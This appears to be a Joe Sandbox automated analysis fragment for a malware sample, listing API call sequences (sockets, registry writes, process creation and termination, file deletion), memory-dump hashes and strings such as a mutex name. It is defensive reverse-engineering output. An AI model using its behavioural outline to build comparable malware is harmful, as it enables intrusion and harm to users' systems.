                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$wsprintf$PathTemplstrcatlstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 2776683041-0
                                                                                                            • Opcode ID: 360c5ebdedcef77ee8c19fd1d27f62b3cfd89d63db90a06713a2c737b35c9e11
                                                                                                            • Instruction ID: 3ebfebf5dea7502680efe20b426e4d3b800378959a98686a9ea4695494b73c78
                                                                                                            • Opcode Fuzzy Hash: 360c5ebdedcef77ee8c19fd1d27f62b3cfd89d63db90a06713a2c737b35c9e11
                                                                                                            • Instruction Fuzzy Hash: 2721B8B9600108BBDF04DB64DC88BFA7779FF48300F008255FB09C7250DA749980CB91
                                                                                                            APIs
                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 008F6F1C
                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 008F6F7A
                                                                                                            • select.WS2_32(?,00000000,00000000,00000000,00000014), ref: 008F7052
                                                                                                            • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 008F7081
                                                                                                            • closesocket.WS2_32(?), ref: 008F7185
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: closesocketrecvfromselectsendtosocket
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4198204009-2766056989
                                                                                                            • Opcode ID: b3bbb44ecd5fb7d0477ecc7b55607378c561bac1ef54ca960bfd12f3ef7a5bfd
                                                                                                            • Instruction ID: 465efa2eba28571f104448c49d7eec20a6339093870b7443f1e0f8e6108484b2
                                                                                                            • Opcode Fuzzy Hash: b3bbb44ecd5fb7d0477ecc7b55607378c561bac1ef54ca960bfd12f3ef7a5bfd
                                                                                                            • Instruction Fuzzy Hash: E5712871D0826CAAEB28CB24CC55BF9B775FB48344F5042E9E39DA6180DBB05EC98F51
                                                                                                            APIs
                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 008F7580
                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 008F75D1
                                                                                                            • select.WS2_32(?,00000000,00000000,00000000,0000001E), ref: 008F76A9
                                                                                                            • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 008F76D8
                                                                                                            • closesocket.WS2_32(000000FF), ref: 008F7768
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: closesocketrecvfromselectsendtosocket
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4198204009-2766056989
                                                                                                            • Opcode ID: 7b9b4dc64e815b89a5fbc06f8cbf3377648e6dd44421e8e68c1ffdb59216cf3f
                                                                                                            • Instruction ID: a0ecf5078009666166b795a9bf952149de32adfcc3a5480ad86d6f3c631ce00c
                                                                                                            • Opcode Fuzzy Hash: 7b9b4dc64e815b89a5fbc06f8cbf3377648e6dd44421e8e68c1ffdb59216cf3f
                                                                                                            • Instruction Fuzzy Hash: 205117749082AC9BEB28CB24CC95BE9B7B5FB45304F5081D9E39DE6280DBB45EC48F50
                                                                                                            APIs
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00902A4E
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DE0), ref: 00902A7C
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DE4), ref: 00902AA2
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DE8), ref: 00902AB1
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00902B0C
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DEC), ref: 00902B40
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DF0), ref: 00902B66
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DF4), ref: 00902B83
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$lstrlen$ExchangeInterlocked
                                                                                                            • String ID:
                                                                                                            • API String ID: 3054446656-0
                                                                                                            • Opcode ID: f251652526d4e74584778829c1695ffec40149a62fe5c5f81f76b67af7039f1c
                                                                                                            • Instruction ID: 53b48b77f554ce7ed059a4092d2b22657bd48de8755cb458136dd99342c8c000
                                                                                                            • Opcode Fuzzy Hash: f251652526d4e74584778829c1695ffec40149a62fe5c5f81f76b67af7039f1c
                                                                                                            • Instruction Fuzzy Hash: E2317276A01148ABCB14EF64DC8ABBE7B66FF84700F148525F605D6681CA3CD9808B55
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(008F26E0,40000000,00000000,00000000,00000003,00000000,00000000,?,008F9E89), ref: 008F9AF1
                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,000000FF), ref: 008F9B0B
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 008F9B20
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008F9B2A
                                                                                                            • WriteFile.KERNEL32(000000FF,000000FF,00000004,00000000,00000000), ref: 008F9B42
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 008F9B4C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFileHandleProcess$CreateOpenTerminateWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 2603052737-0
                                                                                                            • Opcode ID: f654683e624398c6da07112a075f405d24bf6eb2b5841f7e47f6a81e9010c0dc
                                                                                                            • Instruction ID: 5fc2175eefcec5dadf3dc70ea64a3937851373f7eb207c618f1fdbb8c9abc4b5
                                                                                                            • Opcode Fuzzy Hash: f654683e624398c6da07112a075f405d24bf6eb2b5841f7e47f6a81e9010c0dc
                                                                                                            • Instruction Fuzzy Hash: 5401C575A41208BBEB10EBA0EC4DFA97B78BB48711F108249F715AA2D0D6B46A84CB54
                                                                                                            APIs
                                                                                                            • wsprintfA.USER32 ref: 008F4F6B
                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 008F4FFF
                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 008F5021
                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 008F504B
                                                                                                            • lstrlen.KERNEL32(?), ref: 008F505A
                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 008F507A
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008F508C
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 008F5100
                                                                                                            • wsprintfA.USER32 ref: 008F5153
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 008F518F
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008F543A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Value$Closelstrcpywsprintf$FreeGlobalQuerylstrlen
                                                                                                            • String ID: joneC:\Windows\
                                                                                                            • API String ID: 3359840872-2213015650
                                                                                                            • Opcode ID: 7149003c00484b7ca84b18579cfce9d778fef1246bbf9a4f02ba99f938c98f9e
                                                                                                            • Instruction ID: 652bae0827217ff2e87231c9d7245f6645ef12cf607e8d1fcdd788a99396b65c
                                                                                                            • Opcode Fuzzy Hash: 7149003c00484b7ca84b18579cfce9d778fef1246bbf9a4f02ba99f938c98f9e
                                                                                                            • Instruction Fuzzy Hash: B6419FB590592CDBCB20DF60CC85AF9B775FF58305F0882CAE319A6240DA725B84DF51
APIs
  • Part of subcall function 008F7FA9: select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 008F80DA
• GlobalAlloc.KERNEL32(00000040,-00000C00,?,?,?,?), ref: 008F81A1
• recv.WS2_32(00000000,00000008,00000400,00000000), ref: 008F81F0
• GlobalFree.KERNEL32(00000000), ref: 008F8247
• send.WS2_32(00000000,00000000,?,00000000), ref: 008F826D
• closesocket.WS2_32(000000FF), ref: 008F8283
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: Global$AllocFreeclosesocketrecvselectsend
• String ID:
• API String ID: 424924859-0
APIs
• GetSystemDirectoryA.KERNEL32(00000000,00000080), ref: 008F9322
• lstrlen.KERNEL32(00000000), ref: 008F932F
• lstrcat.KERNEL32(00000000,008F3C90), ref: 008F934E
• lstrcat.KERNEL32(00000000,008F2288), ref: 008F9362
• lstrcat.KERNEL32(00000000,008F268C), ref: 008F9375
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: lstrcat$DirectorySystemlstrlen
• String ID:
• API String ID: 3692445580-0
APIs
• Sleep.KERNEL32(00001000), ref: 008F945E
• Sleep.KERNEL32(00000080), ref: 008F947B
• lstrlen.KERNEL32(00000000), ref: 008F9495
• Sleep.KERNEL32(0002D000), ref: 008F94BF
• RtlExitUserThread.NTDLL(00000000), ref: 008F94EC
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: Sleep$ExitThreadUserlstrlen
• String ID:
• API String ID: 3026710222-0
APIs
• lstrlen.KERNEL32(?), ref: 00900C6E
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000022,00000000), ref: 00900CA0
• WriteFile.KERNEL32(?,004A0770,0001E200,?,00000000), ref: 00900CC6
• CloseHandle.KERNEL32(?), ref: 00900CD0
• GetFileAttributesA.KERNEL32(?), ref: 00900CDA
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: File$AttributesCloseCreateHandleWritelstrlen
• String ID:
• API String ID: 96072700-0
APIs
• lstrcpy.KERNEL32(00000000,?), ref: 008FA220
• GetFileAttributesA.KERNEL32(00000000), ref: 008FA236
• DeleteFileA.KERNEL32(00000000), ref: 008FA24A
• Sleep.KERNEL32(00002800), ref: 008FA255
• RtlExitUserThread.NTDLL(00000000), ref: 008FA25F
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: File$AttributesDeleteExitSleepThreadUserlstrcpy
• String ID:
• API String ID: 1172011736-0
APIs
• lstrcpy.KERNEL32(?,?), ref: 008F46EE
• lstrlen.KERNEL32(?), ref: 008F46FB
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 008F476E
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: CreateProcesslstrcpylstrlen
• String ID: D
• API String ID: 2742767947-2746444292
APIs
• wsprintfA.USER32 ref: 008F5AF0
• RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 008F5B2D
• RegCloseKey.KERNEL32(00000000), ref: 008F5BFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: CloseQueryValuewsprintf
• String ID: %c%d_%d$joneC:\Windows\
• API String ID: 2691868063-3632261859
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
Similarity
• API ID: __common_dcos_data_controlfpexit
• String ID: xK@
• API String ID: 3450241358-3237099428
APIs
• wsprintfA.USER32 ref: 008F5AF0
• RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 008F5B2D
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: QueryValuewsprintf
• String ID: %c%d_%d$joneC:\Windows\
• API String ID: 2072284396-3632261859
                                                                                                            • Opcode ID: 22842dc841e2fa60b763a1b0fcddf0e0c3af6b71953fffdd7f990f4ddc7ce6e0
                                                                                                            • Instruction ID: d07b8539e0b854058d4ab5f20ee6d8d6619709edc8d6407cd488f2a190945bdd
                                                                                                            • Opcode Fuzzy Hash: 22842dc841e2fa60b763a1b0fcddf0e0c3af6b71953fffdd7f990f4ddc7ce6e0
                                                                                                            • Instruction Fuzzy Hash: 4F01DEB595112CEBDB24CFA5DC88BE9B3B4FB58304F2042C9E209A6250D7749BC5DF54
APIs
• htons.WS2_32(?), ref: 008F8317
  • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
• GetTickCount.KERNEL32 ref: 008F834E
  • Part of subcall function 008F7C4E: socket.WS2_32(00000002,00000001,00000006), ref: 008F7C83
• send.WS2_32(00000000,00000000,00000008,00000000), ref: 008F8389
  • Part of subcall function 008F811C: GlobalAlloc.KERNEL32(00000040,-00000C00,?,?,?,?), ref: 008F81A1
  • Part of subcall function 008F811C: recv.WS2_32(00000000,00000008,00000400,00000000), ref: 008F81F0
  • Part of subcall function 008F811C: GlobalFree.KERNEL32(00000000), ref: 008F8247
  • Part of subcall function 008F811C: closesocket.WS2_32(000000FF), ref: 008F8283
• closesocket.WS2_32(000000FF), ref: 008F83BE
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: Globalclosesocket$AllocCountExchangeFreeInterlockedTickhtonsrecvsendsocket
• String ID:
• API String ID: 1332007968-0
• Opcode ID: fbba224e10e4b62ebe950106d1e5af42fd75d495637597e56295ca8425f06dba
• Instruction ID: 889e49a21f7e135a9a36dc65b3d1d88dc5ac90e6e78a69466977e9e62fdb251f
• Opcode Fuzzy Hash: fbba224e10e4b62ebe950106d1e5af42fd75d495637597e56295ca8425f06dba
• Instruction Fuzzy Hash: 44217F71D012289AEF60DB78CC0ABADB7B4FF44300F0446A9E30DE62D2EB744A959F51
APIs
• DeleteFileA.KERNEL32(00000000), ref: 008F45E3
• CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000020,00000000), ref: 008F45FC
• WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 008F461D
• CloseHandle.KERNEL32(000000FF), ref: 008F4627
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: File$CloseCreateDeleteHandleWrite
• String ID:
• API String ID: 656945655-0
• Opcode ID: e73568831fb142da548600f0b7ed5c1b42b32fc0568239302f8b86b92a019afd
• Instruction ID: 985dc8304132fa01918c2a5cfba8be4dbb2eb674fb74d8360cf37c33ef7099b3
• Opcode Fuzzy Hash: e73568831fb142da548600f0b7ed5c1b42b32fc0568239302f8b86b92a019afd
• Instruction Fuzzy Hash: E1F0E779641308FBEF10DFA4DC4DF9E7B78AB48711F508645FB05AB2D0D674AA448BA0
APIs
• select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 008F80DA
• recv.WS2_32(00000000,00000000,00000001,00000000), ref: 008F80F5
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: recvselect
• String ID: @
• API String ID: 741273618-2766056989
• Opcode ID: 69eafbf400bfa1249c6a5ac8e91890ae99135be97f86d3847c3b47af1ce91b06
• Instruction ID: 4f8a0f487c2d3c2ef445b04ff4531bf253798c0cecabe5fe30e6fdde9b4f8de4
• Opcode Fuzzy Hash: 69eafbf400bfa1249c6a5ac8e91890ae99135be97f86d3847c3b47af1ce91b06
• Instruction Fuzzy Hash: 1441E770A0421CDBEB68CF54C891BE9B7B5FF94304F108199E609A6280DFB56EC48F91
APIs
• wsprintfA.USER32 ref: 008F5153
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 008F518F
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000400), ref: 008F51D1
• RegCloseKey.ADVAPI32(?), ref: 008F543A
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: QueryValue$Closewsprintf
• String ID: joneC:\Windows\
• API String ID: 3301640424-2213015650
• Opcode ID: 447494624bc029406770ae0887212bee2760cd70d493b9e9005808f1eb447eb0
• Instruction ID: 0d5edb781452668edd4e204f1703352a4e354f137a32fb8157ac42fb40705003
• Opcode Fuzzy Hash: 447494624bc029406770ae0887212bee2760cd70d493b9e9005808f1eb447eb0
• Instruction Fuzzy Hash: 62F0E7719121289BDB20DB60DD84BEAF378FB54705F0852D9A729A6140C732AB98DF54
Strings
Memory Dump Source
• Source File: 00000023.00000002.4178379920.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_7f0000_kgTxkwCMEtRJHvgbWwUB.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-162185446
